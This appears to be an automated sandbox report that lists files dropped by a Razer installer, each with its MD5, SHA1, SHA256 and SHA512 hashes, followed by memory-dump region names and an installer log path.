MD5 0a540d4d964be671e0b359a6df1bdda3
SHA1 35a3a95ee3ce802328ea0334abcda110cbd4a7c9
SHA256 8f0cd4ee8b8b590dd3e9a0af236b4cba2e99016603ffa8897f12bbbfeb36fb08
SHA512 b3e15fda68b63d9604049799f23e54b5362851cfcde6915870059bd9c75ac8c5330a3312a07c92b23fcf7d474f8e4a05cda2fc21e60d65ab5ccb3c5b02cfd9d5

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-time-l1-1-0.dll

MD5 c8f1a3b19e5103751202010805bce5c9
SHA1 179cf585ce939d05f9610d4b684e4dda6f452f76
SHA256 d5e2fb8495bbbfb66b2612cd5179c1a5f4746dcdd043ecd474363ffe4a8deb4f
SHA512 879fbe66e5440cbe01bd1814a36345fce6454196c8457969d2ee9e93b749df91d0d95b1da1d368063b7ef2a3ed538449b456eb2c7507a27de60105a0d37dcb71

C:\Windows\Installer\Razer\Installer\App\BLEConnect.dll

MD5 ba549837eca0ce18e7c0b3bbe0cb2292
SHA1 d48a8fd14467fb211f52735e5e92ad4f12f07cee
SHA256 bd882b04e425ff50f6b95ae0a7c3c621063cb31c202af38da8b13ac4e17c19f2
SHA512 21f6f6b01a00c592ffbf1c4e5a05609abdf9a0a91ae1a55d648f76c206a6d35f18d4acd66e4d00bc186de825402a102b630505091341bfbfb17e4273ba7e693e

C:\Windows\Installer\Razer\Installer\App\AWSSDK.Kinesis.dll

MD5 76e80582372e4f00586d51e5f4410a27
SHA1 648b54c8c5269f8cd59524a97108e6288afdb412
SHA256 c069151bc437f06025142a78b5dd7477ca6a847d1bba7323cd962f4496f2ca84
SHA512 95b271d2173eaa94ffc0b62894efb7b8f971bd6c013d65bed6a0b5ff1877bae346b66cb4d80913c37eab03c4cd0db644a888b0b76178d691b1175b2af32a5e9e

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-string-l1-1-0.dll

MD5 a3eccd7f2f2c45d1553055593278645a
SHA1 23cd6aed1b198ca515d7adb213efae780fbf0537
SHA256 d51dfd972e6df5e8185dce0b4eb26dccb0527c5f1c63bc081677335f69b92b67
SHA512 1dbf60f5df95e72b98b72faccb52f83585bc0bc5b1f65c259e8568d812461b738bb37c96e72e2f272370788cc7dcd7a8e5a698d9fb2c773ce0e17978c19ef858

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-stdio-l1-1-0.dll

MD5 65fe48962755451a1a5bab26e6fd978d
SHA1 d1322c477fe4ff61eedf9433b8deddee27f5adb9
SHA256 5a3d9a0a2c1f9b14cb52d9cce92b761ec1fe0460ea7d994179c96648455ead84
SHA512 940269af2c3a8b5b43ca936df1bb5338ae5166f04c34a163b5938895d19bdd7eadc156add1b96b5508e06088419a7d8f466f40bf01e64b4c547fbc1b20328ed7

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-runtime-l1-1-0.dll

MD5 2f10f2255271b09d58af75f58476899c
SHA1 ca37f8e4c99fb178e718e99eed286d1ef32b00fc
SHA256 24bc147f7c8a2dfcbe9296d83ce75a1f2c02076d8f6e6c81f6032c927ed5888a
SHA512 74d85f5a40bd22eb9c85973bda5e596c3688096dc78fb6984f84ded4757ae82d77894c4cae0f24de77d211bbd869f9a4120a104d7c2ed161b4bb7b8568cf5103

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-private-l1-1-0.dll

MD5 538057da2c6ec8b927904346bb808792
SHA1 1156a3d1a653678b9f85aa64ff65bd3c10510b5e
SHA256 f8720e9250c5d5aace6918e1f67f6105f2cd08c0cf55633d2b6b28032d904e9a
SHA512 228531381ae55e7c1a24cfe36101325cd0b95899f2a125c72e82043f13248236171ad89a497e5b1d6c19a5febb8d2bd38cb43e81fbd753f3088aaee1c1791b7d

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-multibyte-l1-1-0.dll

MD5 b7e1023ebbf0e5018c58b5488c03a643
SHA1 b10d3a570d4a44b87480d015aac4d04ef3f0a355
SHA256 e7238f5e38d3991e9d6219255e8cd951d6dd431402c4b4b295a68bd43efa3d48
SHA512 c5536416aeba4b37931e2961a29ea4c8679f6d942289325c9067d46b36797e404c0d8dfd01ce997e89bd42a7f084029d2f2d3cd7485b8cec5e66db50ac1df565

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-locale-l1-1-0.dll

MD5 bc75b80a80802146e79c383c94542f06
SHA1 7da2020a855ea6c003d905551a28af456e7519c2
SHA256 81a7a98e11ae94236f34a82a0d450a1100a9b8e752205248de0037a764b91a07
SHA512 0b6a8f6809f1a39c90bfe58ef0d05d997be307cb18771ff8fed6539bf7e19ee8cc3bedc44e1c22f34441db9b82a6470d3814fc7465d1ea82fa30d37278a0fe65

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-heap-l1-1-0.dll

MD5 aad41d33906cfdb31681ce8276648481
SHA1 6367d1990873c5af2f5d05d31ea083fb8b127883
SHA256 242cb185643df586a5f55735e8810b8d2b6b095c78be206e42cdaae7665bb2cf
SHA512 43b2cf09fcb13211f5bcab6942050e03dfb9ce36b727727f7c764df3754f332f04dc81f411e55caeecfa676c43dd1e977f29b0042c485babaaad609c239a84a9

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-environment-l1-1-0.dll

MD5 e8ccecac4f06679b9d5e77333d216ee0
SHA1 377363813d0fc18083bdb0456a66efb6598a763a
SHA256 2cf24c6aac48261ab04eb616e85dd707417697764f860fc29dd3955dd2c49226
SHA512 e37db74e11138639e3bb02270589f977bfd803d450ff098d474ca461fd1fabc8e646a177a2082fd0a901fbe15225c4d352567a561c453f56ad8e0097838b945e

C:\Windows\Installer\Razer\Installer\App\api-ms-win-crt-conio-l1-1-0.dll

MD5 032a139ea3cc41f2bb801cd580759a75
SHA1 4d88e10bcc4e75edc83bca578510d53fc827aa1a
SHA256 905f86530c56c9b453dd8bd9770440de0f6f35aa84b171de747a04d112e35aad
SHA512 4f574dfe92e90c7d6f162c0b69dd56c96031790abe15e52121c7e44980bbab86914ee06fc153fa5f3a77c4f1c6e4c24d7044507880a80b587872477708506a50

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-util-l1-1-0.dll

MD5 96d9965ea02eefeadf1f122dfa724449
SHA1 c6f9eb1babe64b30fb1ff6b74e93db8ac41d1294
SHA256 4f31b2888ca82bd1ff40d71e2d11500456b99940dd469bfb097fcd304676fa38
SHA512 4018eae1e00899a5bd392c9b4f25561cf03292011f52387edd77058f49bd1b7456570f0108338088e5711bf5d6ba33aeb2c7bcd5d24d2744b173ff75bba0347b

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 a13048905fc64cd2103094c871c6d826
SHA1 cebb1a74bd5196a3fe174a20543335074a1b7397
SHA256 fb23439a5982e723e8e4ae1a5a35f9bbbfba1e76feb4596668f57093b231da6b
SHA512 e23effc6c17177d07f43955cc8ffa17ed05cc2c0a6430078b37de8536170dc3cb4f8970eba1049b10a789ab5acb423745f9d842dac4d63d5714751186a3f071d

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-synch-l1-2-0.dll

MD5 e4110aa5c8a32b63de2c85e0bc297c54
SHA1 6039680f47750cf56d0c9a1768de815a44b83de7
SHA256 01bb32d692b86ebb39a76893125e0f3aaf957c6e4bd682fb46eac32f6fb65be7
SHA512 0631ea8224403ca113dff9b17852e92c1fcb2820e4f335b668b12689d2a8f058ba33905692f2fd0f4897f8f766db816747ec95478d854b75a0803d2c899e6d98

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-synch-l1-1-0.dll

MD5 99572ae21d1c8afe3d02f1124979e911
SHA1 5b17addc80b1406a3eaa615f5e37d92e953a0bb7
SHA256 e7d39dcb79d739ec030e9a4e2165b264a24c400566056e1fda267fdd1a8b36bd
SHA512 27ca8149d1f0c625de90a3f4cd4a4930ab0c1362ee10a7131ebfd2a88065c2a34c8ad7fb6d95ce33072146b9309488cbfe122984606d631b99d925e3fc42fcff

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-rtlsupport-l1-1-0.dll

MD5 525a156e0ff61306fd44bf7937cacfae
SHA1 6a9a88317a55c939c0cb9f77256f5c3f961d0562
SHA256 41c69b545d931045a280f83b2f5fbe0ea18c35ac42dfca54b661b42fe8e4f982
SHA512 c99147eba45e9561b7a2802b0c15a2df2ac886ce95a95f2980f8bf4d1dff92a69b94f11cd17383b577303f24295b1b7e52b8c80ad26c0bb08862c726b9cd8841

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-profile-l1-1-0.dll

MD5 a472bd416bdc12668523670360650910
SHA1 831d930ef9917e0dccacd8e7f7fd6f3d90082441
SHA256 48dceeea29558966c391cda34e5755386c2e7e252ea0a03d8d1f21e3cb370c5b
SHA512 166134e6c3403f4437e10afb514a55677481d3b03f7cfdf17917a0bb6fa1f387feae58d7dd5dfbc375eae66d24f10c3163ba5958c22beb6978c0b778c2883b6f

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-processthreads-l1-1-0.dll

MD5 d5c4b8f7260563f72150a84fe884ee31
SHA1 dae1185359ed25a4974504cd1ceaacde28d4318e
SHA256 02839f3b2bdf6adfc89d2f800cc8acda59a40c3e7ce14ef3026f4c72e202297d
SHA512 09ca23413eecf1df94aa36e53fc6fff0f402f21eda2ef79be6aa087818a5bb82ed98db790a2b5cf4ef91a8f70d8e27f56313bc2054a26872d2cad611c472f0b7

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 2a61e4e21bf255107884b6520af5bbcc
SHA1 884eb1a835bcde4e7fd98134f0be797229f4239a
SHA256 64742ee0729cbe72555247b0165fae03bea7a6b0147869253dae3bb0072173e8
SHA512 d0ca104904352586bbd3da654125b3df9355fe250938a465e8e900d135cec397f1118fdf54829b076df82b8e45fcd7656c2c7aa33ad3c0af5189f7a55e43f498

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-memory-l1-1-0.dll

MD5 0ee9e0c830a7534dcfc9be72146796f9
SHA1 cecc860b494135482ae693f8e252301073a98578
SHA256 8f3f0fd765a37f48162f0bd00c3047e79b4eda355223bfcbed4d35b51349cfcc
SHA512 47161e02f4478464ab45c1e3bf9d244d34613e0e68ebe48511a9a0c4e7f8ddb0c1dfd59707c6968c5d76d5027cd19ef748d1235bf74b976410ea6672a6a4bcaf

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 e33f52e89dfc376eaf7aa655f260ca76
SHA1 b66e1f934f491544190714966031b6dfd2e349ec
SHA256 0bd03e89a539aaa3100e2f7d9a058964730320e55aee1f85be8fd243eea7017a
SHA512 95cb889599801ba7fa225b633d0fe25fdcc8b495dee5eba05b15a6e53a8a3643b5defe1a881236c40f4fa4365d6775ece067dbb526afdf2015f4d1355c9dfc57

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-interlocked-l1-1-0.dll

MD5 48a5e206d92f3102256ec65e8d570ee0
SHA1 76024fad398dfa4734afce0cc2e5ac117f090ba6
SHA256 a272ae4fc60e511f48950b08f106fcdd3bc86831df908ee78d630f1ae921880c
SHA512 65407da566b571e050c25448be6042e84b0c1c7248422cba00b543af9de425a723b0c7c54c4eb6f534e42b1679a058562d500875ddc4f2b52e6b8e6107b1b575

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-handle-l1-1-0.dll

MD5 6a35a52d536e34ba060a19d06b1dac80
SHA1 0494a9cbf898e5babb6e697fc2de04a128d2fc35
SHA256 a369ef130749bf8cd9f67055179e6f537f200c060af47493d49473912a95021e
SHA512 a8aeb58bcf4b314212c2ab5a8fd3c2edeb97e680f774171d4a79390aa23bb62a414aef0ecd5286ffb68b7ed8f6e713ff1892d6d4cc2cbb67de916c6062e762d9

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-file-l2-1-0.dll

MD5 b9287eb7bcbfdcec2e8d4198fd266509
SHA1 1375b6ff6121ec140668881f4a0b02f0c517f6c7
SHA256 096409422ecd1894e4d6289fd2d1c7490bd83daff0c1e3d16c36c78bd477b895
SHA512 b86348d3f42d0ff465066a14c281088c73ec5e03efacdaabe27a410b054a8a81b438d7e5d030b0d95f53b07783911b8b8200581d4e0b6f1b3cc79f4aae1d67df

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-file-l1-1-0.dll

MD5 d826d27c73d9f2420fb39fbe0745c7f0
SHA1 6e68e239f1a58185c7dad0fcfaac9ecfd2e5726c
SHA256 c0e5d482bd93bf71a73c01d0c1ec0722ea3260eba1f4c87e797bae334b5e9870
SHA512 c49843eb10e4e54c66e0e194dbd29ceab9094bdfe745b6a858cb03e34d73a6326f54804e5e5505deacc87146cbdfba17a0f02e62e76c685bce0cd1ff41962ff4

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 9d74d89f2679c0c5ddb35a1ef30bd182
SHA1 22eaed07a6e477a4001f9467b5462cf4cc15cc16
SHA256 e207ffc6fef144e5d393e79de75f8f20d223f1ac33a011eeb822d30fa2031046
SHA512 725626e961d32398ea5aa120ac0339deeb493fc02ee7ef4d8e586173fdbf768b5cbb1f16f093ae4ecfee87e661170f8f832777640a353df5d651af4a62a2d819

C:\Windows\Installer\Razer\Installer\App\api-ms-win-core-datetime-l1-1-0.dll

MD5 9f3cf9f22836c32d988d7c7e0a977e1b
SHA1 1e7bbd6175bdb04826e60de07aa496493c9b3a3b
SHA256 7d588a5a958e32875d7bd346d1371e6ebfd9d5d2ede47755942badfc9c74e207
SHA512 16c98e6aec67ffe4558c6d3f881301490be5d8a714c1adc6735005613251adb8e1c2cb9b1c0d2504a9a99c61a06b0e30c944ca603fc00fbb18cd20ba1c9bd697

C:\Windows\Installer\Razer\Installer\App\AllSystems.json

MD5 60174d20c177137f40f105103494955d
SHA1 9f416a3648838b6b22a51f6b77ebb4a40af282cf
SHA256 ae1fdc5f37e9a8382dc4e114f633612dbee04ecbb46ab86c0d1a39bdd8c3e527
SHA512 477378dd6533b32a5ae3b069b3eba9c097d53f5c5aa827ba2111f52f38eada730000df6e14f0d4c1950798d4bbd66946cfcff76468e4edab3ecc553e29aab161

C:\Windows\Installer\Razer\Installer\App\msvcp140.dll

MD5 a84a8a708751e2cb1f2bb117e9b7f390
SHA1 a9378bae50093465e2ea1567958a1bb656d42149
SHA256 f656f0f98cf2510f4e0fe5d5666643028a6b8bac50bf553c0a464456c0e82934
SHA512 609850f700a3147bbd1947c26ece31aeb0ca70249ec4dcd22f1bdc922fb24b0a20f569de827d4818f32983b65456bc9a9a0e9c23ba1e8eebe8520581a814bc49

C:\Windows\Installer\Razer\Installer\App\InstallerConfiguration.xml

MD5 24fb4d1bdd318445b3533b713cd15e74
SHA1 37745c6785b12535c6236ec05f47ab4a39d6c036
SHA256 3cba28341496ef931b5735176fc6f640012d92ffc18cf95eddd648ee35521caa
SHA512 13ce4750943782cbe39d60fb4ea9c507073849b93ed3794480c4cadf748284e7769a7e12038958042bc7c702b693f1f0aed89dc904f291db1637d5da528a05d2

C:\Windows\Installer\Razer\Installer\App\dummyProt.json

MD5 32a494aa96aeb6a5de217b3dce460c3a
SHA1 6f25af72b649c174cf8357fc24b727d11edcf875
SHA256 731b66b46ae9477920e21e26f4e30fbb9e2e24bc135a0811568254d23598ce9b
SHA512 eb0c39951b79a8684153881881089af50d7fbb7a423e8cbefda226d895420adef80a9166d11111f74f4ff520416a2a1e918d842456ae4d6c160bb49aa6f56491

C:\Windows\Installer\Razer\Installer\App\dongleV2.json

MD5 c0755b4f4a7a8bce8c343b6b8d41ef6a
SHA1 0bc810d82b979f3b84df3847f28508bad68d3db2
SHA256 044103626cfb031b8b3736f172257af5090bdcd097b160d11013c64ae3c710f6
SHA512 9cdc9f0dd567dad666eff2aa4bc9e3ec7bf8d651d2524156721cef185c1f35a63ff0e2a8589a745cedbb9fd228d9427e59401a2cfb46ff3c8a4ba5b0fc6a24c4

C:\Windows\Installer\Razer\Installer\App\dongle.json

MD5 5bfad26ad566016f436c5c87cb57bff4
SHA1 a50b385d7e4d6fb20911119f3cde9abe8f3ebbad
SHA256 b692f6b0ef46cacfaa10f4069d4bc88ccd054e6149b55e15c5e245cc69d25ded
SHA512 806525138fb39c8a4c3c83f48151edc5775ec0d8453f0d8bd051f4f1a50504a6d4631a2579b5e39a2f17bddc9da380f5e471cdd2bd6f2906e8b12d54d49309d3

C:\Windows\Installer\Razer\Installer\App\dockEID.json

MD5 9e2ba28af9b4c6972ed387ce2245d8a6
SHA1 13f2af4f725e61a7fb07058e8424b3401a1cf349
SHA256 9bdedfd8cb1722256f35a80fe26c4ae469df974e3f08b0ed2b0e2506ea0d004a
SHA512 53e48f3e39e95e042f10f7ea2a3e295855cdb6a13d51ce4319acfbb76bc10cfd5f7a9110d22dbf9c6958981dab7b39f8ec8306fdeced094a706c3b7610b848c2

C:\Windows\Installer\Razer\Installer\App\cpprest140_2_10.dll

MD5 ba53f0cc539f5d03b5ddcbc68ba1d207
SHA1 a7d6d5e4e26a5dd7cd76a1baae0ac173b1c85d59
SHA256 aad1bbee36f08b0b87aa0b14b273f1e6aeaabb1a1500ecc9bff5500292ada648
SHA512 7fe242bb44ea3f4b6a03727e2e20981deb31901a9bf626bcf5925b688305ce5af99c730b3c1ba9eb73a6d9939c91ebb8948c502d622a401ed1ab26d82d9ffaae

C:\Windows\Installer\Razer\Installer\App\concrt140.dll

MD5 48db05391b6405f67f65d67095cbfdd9
SHA1 17b78dfe4051aa5e363fd2a5a73e5786f5785be4
SHA256 c1e5d240bc3a1c5b36770110ae35a10fbf7438a5c617e8c751b00bec10fce063
SHA512 a3c9ef1ed24d30af0cc46f0474b5e264e065c758f30fc252ce53bc369bec40f2dfb4c165f634bbf737d284b7a25fe10323d65ef0b805b01de6783ef0cc58ae1e

C:\Windows\Installer\Razer\Installer\App\BLEConnectWrapper.dll

MD5 65611ed7ce210777ba8ae786a5d1a886
SHA1 cb685859d0c4b616fbfda578d3af8369ca2e3ef4
SHA256 315014358c49304953e4d50009b3295dd1350fa995477b3f17163282cfb7d807
SHA512 f36256071f9a47ceb15dc57004f2a74bdc377582fe20317175181060ccc2d49f58ef71627eaacdd775946e40e531ed8941a2fec56a5c45323002fd216f7ddcd5

C:\Windows\Installer\Razer\Installer\App\Razer.DetectManagerWrapper.dll

MD5 75e24bdde1cd047d8fcb5487b1a3415b
SHA1 68da893871e7878ff3785d8fbac1b2d23eda2321
SHA256 9ee38e8507708d3338b96221f0f10982bbf1ec22fa66243ea3158fc0cf251f6b
SHA512 ef9d297233b422c7937feeb64e6d80df3baec1213cf20b5d4127297ae3ac2763e9318c97215cacb616e049f346466777f8569e3e16c13a9dace50b90f7d061dd

C:\Windows\Installer\Razer\Installer\App\Razer.RazerInstallerCommon.dll

MD5 d8e33e71a1e868ea53c08e98f913d8c5
SHA1 82d30de3a27f7f58a4cd38cd91fa371a249e58dd
SHA256 2c02800fb4a42a5a9c1b65247ef088b902b1f5d22a0f643ac64951100a67e1b0
SHA512 ea3bcd6283e7b3407ba6c0b488a0aff62ec546a5e0339c908dfd0bba563773a5b0950040914b1fe719d42d796341ec381102b294f9c4df066ad98b921ce65e76

C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe

MD5 a3398e51bb13475fb10e1e6f1e0bf3a4
SHA1 f2c5d26124159355921e4460699811f259ec3353
SHA256 4d89cbbb5b187b510ff972ae990b54f69a424fa6862bd10bb9e95c0f4c78fa4a
SHA512 4f3cba6654b45f62092a7306a1a86ae55d2991fece60f9886cdf57aad4a010323dbfb4a20569db3d30a5d5aade0ff20a5e37bd41ba1bdbbeefe7b30abe33a555

C:\Windows\Installer\Razer\Installer\App\rzS3detgmr_CWrapper.dll

MD5 a52218ecfa9a217836a89c57c338e6a2
SHA1 72aab32e94f5a85e39863b446c29b878a81273d5
SHA256 35fc7274acd8342c33213f4d1058f927a3d1a69ce40599decc0898fffa2f9fcc
SHA512 ef4182091db8942f2ecbcb9ee40e7d5046da840ad2083995309f7c918af723a701881378a2f1af1ce1893298d5584d2e7cd0960c1e3eab3cd6dba16b336da2e8

C:\Windows\Installer\Razer\Installer\App\systems.json

MD5 775c312110d971862864b91a2379794a
SHA1 b5a7a80ebd352fd45493f3968ebb2c7735fecb11
SHA256 2f2541706f13fd6d3eaad2628f7b4fa35f0648822edacb8b92d04cea42fc5537
SHA512 3c3428222feef08d3be3896ccfa72a1ae6ee0cb06e9c11f005439041e3f8ab9263a07f04a6c054e0d82edabd48aef9a68ecc45e3fad8803dde365e668f9b58ff

C:\Windows\Installer\Razer\Installer\App\vcruntime140.dll

MD5 b7ebc19a5b23d0d32ff014e30be26061
SHA1 efb3b58b31a27407402a2be0d41aee120519c282
SHA256 5695560a50ed9746696c0d647e55d77459f5981907c177d086df36656a978b19
SHA512 922d94e80cdffeb51a1818c52b5c568597307225eed33c7c07e193322c2e9b0c7a5f17f3f4b57f2e22b8ad7f9509cb893bfc6d07d19af83360da6c0d807aa93a

C:\Windows\Installer\Razer\Installer\App\fr-FR\Razer.RazerInstallerCommon.resources.dll

MD5 b31c172dd1eef50ca4997097c1d90bf1
SHA1 76297138ce086598f9247d207379dca0bd0ba5b6
SHA256 7d11bb0abf4a6ae8d489add7d82cb90ac0298faf348e3a0bb9ff64183d909935
SHA512 2cfb6bae637ac99524074a705df9da69d8957bbf0cb63869eafa119070c78e14f6ed24c3b3df81ef41db7449c24d1650c46ac1efcc13c126a501d2611ed9c266

C:\Windows\Installer\Razer\Installer\App\ru-RU\Razer.RazerInstallerCommon.resources.dll

MD5 0f3e357b568e7f6c4bbd737ca4e76a62
SHA1 3c79cec29446c953b138084185f62a64c6b90bca
SHA256 eeb0cbbcb53e6294012bf9412b7113c3e6b45069794475667bb2649b19374c41
SHA512 0ca364740216ca79d6346711a953f8a41c9daaf6eb3c3c0536d4d69b85b11706be69c5db587bd618a33ff19711ff2124749769c3e7d898d03f4bf0ad4a81107b

C:\Windows\Installer\Razer\Installer\App\zh-CHT\Razer.RazerInstallerCommon.resources.dll

MD5 9b84a3572abcf0f717f1e457a9f941b7
SHA1 3dc58308e6a0747882c310cf935e271d72c59999
SHA256 bc8a635eeee2c0d2a7a89294e1b86bc21fcc817bbdb6e0a3545166f08126422a
SHA512 d6dfd8bbc8bef097e86e6c00476be7c5076633364b28db2b97ce588153283a8f8aa3a3cc592a6e89209f63d6dd8443217d7c1c32dde32e0108ecf9dad4026b50

C:\Windows\Installer\Razer\Installer\App\zh-CHS\Razer.RazerInstallerCommon.resources.dll

MD5 8c0f3a4d39e605d4fc6a5c07bc1528c7
SHA1 2364595cc629e1c073a0ded4c4b840124973bdcb
SHA256 ce8e243207f1b784d3b2d369d5c87f4123b5eb2614552cfb53e60ebd6137d846
SHA512 7ce66409ccd5076d8fd2eeb3c0d94cc12ecab4d52e73a039a7e28495d2b2c2df7d9372b54838a8774ed1d6c42173262386973fab0c0b1ebede70a0c476564a45

C:\Windows\Installer\Razer\Installer\App\pt-BR\Razer.RazerInstallerCommon.resources.dll

MD5 41ba2edc92e7f33f2b3ed76dbe65251e
SHA1 55c66452e9db6a94b6943b99c79a9a53b6394808
SHA256 6f233deebbfed108da76b75da47b37d6ac37dea83d2ecff6a0941b25cdcebd4d
SHA512 8b38bf316019cecd3b92a0f1974a250e1f1c51007a83d561ec5c26365c10d63e4a332cec7ca11abc5c6b08d8b6353d93618446d79cb0fc5637ad8c47fd6d5d90

C:\Windows\Installer\Razer\Installer\App\ko-KR\Razer.RazerInstallerCommon.resources.dll

MD5 6c595dde4ce3d3c29f29b38e639af2b3
SHA1 2fd1deddb95c7bbb36f0c58c7d916ee217e252c0
SHA256 22e16f1e09248ca4162e766c143ca4f932fba4023962f0c45a14d29e3072f6b3
SHA512 67cb0baaad8bf55bdf090e079d042766f87aba1fd88c233b854d102a7fcc54add7e97ad3e3dc4fd1053e710bc31401542ef483dacecd0763706493d9186290c5

C:\Windows\Installer\Razer\Installer\App\ja-JP\Razer.RazerInstallerCommon.resources.dll

MD5 22523785f3ec5e28535dac1ee9813a9c
SHA1 1f89143a11e06fef57cd485089d4d372d6e3a4e0
SHA256 0dd30251ae9df0720aa4db8ca026cb40615b9d692c39e9e48d5f235e797f417f
SHA512 7e6280c37c3393c2320f86fe71f12145419b5c44fdb6abfa52a53b329229e5547b00c099cfcb9726b2117f394118eabf259f48c6bc86a89c11093538d9855315

C:\Windows\Installer\Razer\Installer\App\es-ES\Razer.RazerInstallerCommon.resources.dll

MD5 252f5661b1baa3d6d5ab0a0f2deb569c
SHA1 ad5d390642bba6175aef3ebc1bfd867929a7bb2a
SHA256 6bdb9344af3b9beb8e7f515767697b70affedc52e7eed552524328ec7c59f325
SHA512 cf937a5b61a69231a35201dc05e1c814c77bff504c0f39f3df23caeac61c5e3c9f2d4362408b8a15874e367b0fc2f65dba5c040d40ddce7deb77e6ef6e0ecb1a

C:\Windows\Installer\Razer\Installer\App\de-DE\Razer.RazerInstallerCommon.resources.dll

MD5 781d8c513c3bbb09250ef2e6a40d5930
SHA1 f4702bae19a6df429c5aa7499fcd52bbdab4ea69
SHA256 486334a88e9d5b8c128cbd2acb43bf6741aca64dd6887786bbe667f599562f55
SHA512 54d55a769ffc1adffadcc0c42a3ef71d96a558fca6b5516f9cd16b90bd7dc1acd40e4c47c4ffb1299eb77da71f071ceaddbec3b9c11ba15c06424c905dc10135

C:\Windows\Installer\Razer\Installer\App\vccorlib140.dll

MD5 af530e084fc969b552db842d3de5f285
SHA1 7d0bccad63d6b0f5f4b144ade34afb7fb342d22a
SHA256 92cd13772dd046e9e8a36343c96e6c145ce9072dc51de05aeae4a770cf4b1c33
SHA512 c89cb972067f7971c8ead078a89ebed0d4625a46370c11ddffbdd3f0e56619b55403d19cbf89ad001dbb9c302501bd3ea0331dbbb2a587b6ef79a5f709562792

C:\Windows\Installer\Razer\Installer\App\ucrtbase.dll

MD5 015b30309491a911e75748ad69c9e680
SHA1 2f2243b6ea99689cd54e45b67d9b7d98847f904c
SHA256 dd32570b8183a8b117233333153da29cc8d2ac5b1c868440dd852d9c3f77baf5
SHA512 51159e407021ce78ad64ea91a5e53f59ee15d6d74b9c2891cd6dd532cae3f1d388198e0cd78648ce067e82fa7f01050b4773d95c5c827439f094b289f0ee0ac8

C:\Windows\Installer\Razer\Installer\App\rzS3detmgr.dll

MD5 6721b55ecbfdaeddeae0c09325349f1e
SHA1 835b9619ef9c3c211b80a4dc5857d350e9cda132
SHA256 c4f906944db89f70149103a3fdd749c79ae5d6b355be4b5ab60c967033bdd6ff
SHA512 ae0529cf915193d5be2a2b35cf723808b23b1ad4e0b71d3e2cda657f895250582bdc536ae400ec1bdcdd12498dc323db1dd4f893a31238e82e9e630c0d69252f

C:\Windows\Installer\Razer\Installer\App\RazerInstaller.exe.config

MD5 1cbc9248f7468783548b2b23ee029d2a
SHA1 543da727378029ddeb225ce03271f4ec6486c5d9
SHA256 895d6569a9dec15595621a04a122d7cc0242e455e31a4f048ada9b85156baf24
SHA512 f81db797a8571900ba90759262723bfc071934da4d2e85364a56bd5401d1e5dd881983f79233e3cdd7b9c8dde29314b160880b402e17cd039007a8fbd23cfb6d

C:\Windows\Installer\Razer\Installer\App\PatchExceptionalEID.json

MD5 1a102291d5eb3146ffd0be2969ee0eae
SHA1 f35b9158d851d1ffe1a5dfde74cfecd2ec2bad94
SHA256 0f667d54883d3ba72a8a0cfa864431f79d74905e92976be0611706b1191c3c45
SHA512 56a987b077f88f0806b7daf1eda464fc393279a48859abed0b6ed942056e0d8f3bacdac7fbdcc40362fd1add47d6d81c7b9559083a567d37365c1b275c44e017

C:\Windows\Installer\Razer\Installer\App\NLog.dll

MD5 6b99cc30bb8a163094cabd9454e3fb61
SHA1 afbb727b1d827803bb326ab8c89e70602f85e1b0
SHA256 b911867ef2213e93d6ddaedf37ceeb8022a6aadf2bd0da31dbc75040f3802b15
SHA512 75a9419e447e1b7b71391ae53052b3c58582b52636b4aee70c8dc0a6e837d74245533f380dcc270db1c25b8af406a5fc9a20026c56bb3506654229ae95536621

memory/2688-473-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/2688-471-0x000000001B810000-0x000000001BAF2000-memory.dmp

memory/320-479-0x0000000000050000-0x000000000049C000-memory.dmp

memory/320-483-0x0000000005650000-0x0000000005930000-memory.dmp

memory/320-486-0x0000000000A30000-0x0000000000A52000-memory.dmp

memory/320-485-0x0000000000A00000-0x0000000000A2A000-memory.dmp

memory/320-484-0x0000000000960000-0x000000000096A000-memory.dmp

memory/320-487-0x0000000000A50000-0x0000000000A5A000-memory.dmp

memory/320-489-0x0000000002430000-0x000000000243A000-memory.dmp

memory/320-488-0x0000000002430000-0x000000000243A000-memory.dmp

memory/320-492-0x0000000005090000-0x00000000050D6000-memory.dmp

memory/320-491-0x0000000005070000-0x000000000508A000-memory.dmp

memory/320-490-0x0000000004F20000-0x0000000004F28000-memory.dmp

C:\ProgramData\Razer\Installer\Logs\RazerInstaller-cb19c464-e8c4-429d-93f5-55093fee4228.log

MD5 69c94f695d8790f6ccf41192a68c4fac
SHA1 7fb2b568a331861eb804b0cf36fe355c0492d72c
SHA256 ec3bfa9b6060605000182ec72b8f1d27b159c860ffb158a4a60acac646fc1b95
SHA512 cf13b6dcbdc7a3dccf3a895194f5adb9454e70bc98458a7e07a094df102c93e52581eb7314f6ec4d6df9b623db2072937a532cbf52f786eab66689e25df4e0f9

memory/320-568-0x0000000006250000-0x0000000006302000-memory.dmp

memory/320-572-0x0000000007980000-0x0000000007B4E000-memory.dmp

memory/320-576-0x0000000005980000-0x00000000059A0000-memory.dmp

memory/320-575-0x0000000007880000-0x000000000790A000-memory.dmp

memory/320-581-0x0000000005D20000-0x0000000005D3D000-memory.dmp

